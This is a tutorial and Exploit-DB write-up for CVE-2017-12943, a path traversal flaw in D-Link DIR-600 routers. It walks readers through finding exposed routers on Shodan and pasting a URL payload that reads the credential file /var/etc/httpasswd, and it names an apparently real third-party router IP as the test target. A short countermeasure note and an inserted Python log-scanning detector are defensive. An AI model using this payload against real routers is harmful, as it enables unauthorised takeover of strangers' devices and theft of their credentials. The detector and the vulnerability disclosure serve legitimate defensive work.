D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)

Hello All,

In this tutorial I will explain how to get the username and password of a D-Link DIR-600 router through a directory traversal attack.

Type: Webapps

Platform: Hardware

Choose any vulnerable router (firmware 2.01, hardware revision B1); browse www.shodan.io to explore the online devices (register and log in to a Shodan account in order to unlock the advanced search features).

Search for D-Link DIR-600 router

Choose any router you want and proceed to the login page.

The hack is so simple that it requires no tools other than your browser and a quick copy-and-paste. The attacker only has to enter the following payload to get the user's credentials: model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

e.g.: http://targetIP:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

If you have set the target device, you're good to go.

Now you will see the login credentials shown in plain text. Next, you may use the login ID and password to access the router.

To exploit this remotely, the target router must have remote access enabled. The password file must be located at the expected path, which is /var/etc/httpasswd.

Fix & Countermeasure:

Turn off the router's remote access feature if you are not using it, and upgrade your router firmware.
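As an added defender-side example (not part of the original post or the Exploit DB write-up), the following Python script scans web-server access-log lines for requests to model/__show_info.php whose REQUIRE_FILE parameter is an absolute path, the pattern described above; it also flags the relative ../ variant and double-encoded values. The log lines, client addresses and timestamps are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not taken from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2017:10:15:01 +0000] "GET /model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd HTTP/1.1" 200 312
203.0.113.5 - - [29/Aug/2017:10:15:09 +0000] "GET /model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd HTTP/1.1" 200 312
198.51.100.7 - - [29/Aug/2017:10:16:30 +0000] "GET /index.php HTTP/1.1" 200 1024
198.51.100.7 - - [29/Aug/2017:10:17:02 +0000] "GET /model/__show_info.php?REQUIRE_FILE=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 55
198.51.100.9 - - [29/Aug/2017:10:18:00 +0000] "GET /model/__show_info.php?REQUIRE_FILE=info.html HTTP/1.1" 200 200
"""

# Captures: client address, timestamp, method, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def is_traversal_value(value):
    """True if a REQUIRE_FILE value is an absolute path or climbs directories.
    parse_qs already percent-decoded once; decode again to catch double encoding."""
    normalized = unquote(value).replace("\\", "/")
    return normalized.startswith("/") or "../" in normalized or normalized.endswith("..")

def classify_request(target):
    """Return (hit, decoded_value) for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith("__show_info.php"):
        return False, None
    for value in parse_qs(parts.query).get("REQUIRE_FILE", []):
        if is_traversal_value(value):
            return True, unquote(value)
    return False, None

def scan_log(text):
    """Return one alert dict per log line that matches the CVE-2017-12943 request pattern."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, ts, method, target, status = m.groups()
        hit, value = classify_request(target)
        if hit:
            alerts.append({"src": src, "time": ts, "file": value, "status": int(status)})
    return alerts

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"ALERT {a['src']} {a['time']} REQUIRE_FILE={a['file']} (HTTP {a['status']})")
```

A 200 response to such a request on a device still running the affected firmware is the signal to treat the admin credentials as exposed and rotate them after patching.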

The video PoC and the Exploit DB write-up are below :)

# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact: https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor: www.dlink.com
# Version: Hardware version: B1
# Firmware version: 2.01
# Tested on: All Platforms

1) Description

After successfully connecting to a D-Link DIR-600 router (firmware version 2.01), any user can easily bypass the router's admin panel just by adding a simple payload to the URL.

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.

It's more dangerous when your router has a public IP with remote login enabled.

In my case, tested router IP: http://190.164.170.249

Video PoC: https://www.youtube.com/watch?v=PeNOJORAQsQ

2) Proof of Concept

Step 1: Go to the router login page: http://190.164.170.249:8080

Step 2: Add the payload to the URL.

Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

Bingooo, you got admin access on the router. Now you can download/upload settings, change settings, etc.

################################## Credits go to: tytusromekiatomek